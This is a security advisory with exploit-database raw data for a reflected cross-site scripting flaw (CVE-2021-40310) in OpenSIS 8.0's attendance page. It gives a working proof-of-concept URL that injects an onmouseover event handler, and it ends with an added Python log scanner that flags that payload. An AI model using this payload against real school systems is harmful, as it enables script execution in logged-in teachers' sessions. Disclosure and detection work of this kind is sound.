Vendor: OpenSIS
By: Eric Salario
CVSS: 5.4 (MEDIUM)
Reflected Cross-Site Scripting (XSS)
CWE: 79
Product Name: OpenSIS
Affected Version From: 8.0
Affected Version To: 8.0
Patch Exists: Yes
Related CVE: CVE-2021-40310
CPE: a:os4ed:opensis:8.0
Metasploit: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux
2021

OpenSIS 8.0 – ‘cp_id_miss_attn’ Reflected Cross-Site Scripting (XSS)

OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in TakeAttendance.php via the cp_id_miss_attn parameter. An attacker can exploit this vulnerability by sending a maliciously crafted request to the vulnerable application, which allows the attacker to execute arbitrary HTML and JavaScript code in the context of the affected application.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of OpenSIS Community Edition.

Exploit-DB raw data:

# Exploit Title: OpenSIS 8.0 - 'cp_id_miss_attn' Reflected Cross-Site Scripting (XSS)
# Date: 9/24/2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
# CVE : CVE-2021-40310

OpenSIS Community Edition version 8.0 is affected by a cross-site scripting (XSS) vulnerability in the TakeAttendance.php via the cp_id_miss_attn parameter.

1. Login as "teacher".

2. Navigate to (take attendance): http://demo.opensis.com/ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7%20onmouseover%3dalert(document.domain)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true

Decoded request:

GET /ForExport.php?modname=users/TeacherPrograms.php?include=attendance/TakeAttendance.php&modfunc=attn&attn=miss&from_dasboard=1&date=Aug/9/2021&cp_id_miss_attn=rotf7 onmouseover=alert(document.domain) style=position:absolute;width:100%;height:100%;top:0;left:0; z3as5&cpv_id_miss_attn=23&ajax=true&include=attendance/TakeAttendance.php&month_date=Aug&day_date=9&year_date=2021&table=0&page=&LO_sort=&LO_direction=&LO_search=&LO_save=1&_openSIS_PDF=true HTTP/1.1

3. XSS triggers

PoC Video: https://www.youtube.com/watch?v=aPKPUDmmYpc
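
Detection check for the request described above, as an added example that is not part of the original advisory or of OpenSIS: it scans web access log lines and flags requests whose cp_id_miss_attn value is not a plain id. The log lines are constructed samples, and the rule that a valid id is a short run of digits is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter named in the advisory.
WATCHED_PARAMS = ("cp_id_miss_attn",)
# Assumption: a legitimate course-period id is a short run of digits.
VALID_ID = re.compile(r"\d{1,10}")
# Markup that has no place in an id: brackets, quotes, or an attribute
# assignment such as an on* event handler or style=.
MARKUP = re.compile(r"[<>\"']|\b(?:on[a-z]+|style)\s*=", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def inspect_request_target(target):
    """Return (param, decoded_value, reason) findings for one request target."""
    findings = []
    # parse_qs percent-decodes values; the second "?" inside modname stays
    # part of that value and does not hide the parameters after it.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if VALID_ID.fullmatch(value):
                continue
            reason = "markup in id" if MARKUP.search(value) else "non-numeric id"
            findings.append((name, value, reason))
    return findings

def scan_access_log(lines):
    """Yield (line_number, finding) for combined-format access log lines."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            for finding in inspect_request_target(match.group(1)):
                yield number, finding

# Constructed sample log lines (documentation IP address, shortened query).
BASE = ("/ForExport.php?modname=users/TeacherPrograms.php"
        "?include=attendance/TakeAttendance.php&modfunc=attn&cp_id_miss_attn=")
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Aug/2021:10:01:12 +0000] "GET ' + BASE
    + '23&cpv_id_miss_attn=23 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/Aug/2021:10:02:40 +0000] "GET ' + BASE
    + 'rotf7%20onmouseover%3dalert(document.domain)%20z3as5'
    + '&cpv_id_miss_attn=23 HTTP/1.1" 200 5342',
]

if __name__ == "__main__":
    for number, (name, value, reason) in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: {name}={value!r} ({reason})")
```

The same allow-list rule (digits only) can be enforced server-side before the value is written into the page, alongside upgrading to the patched release.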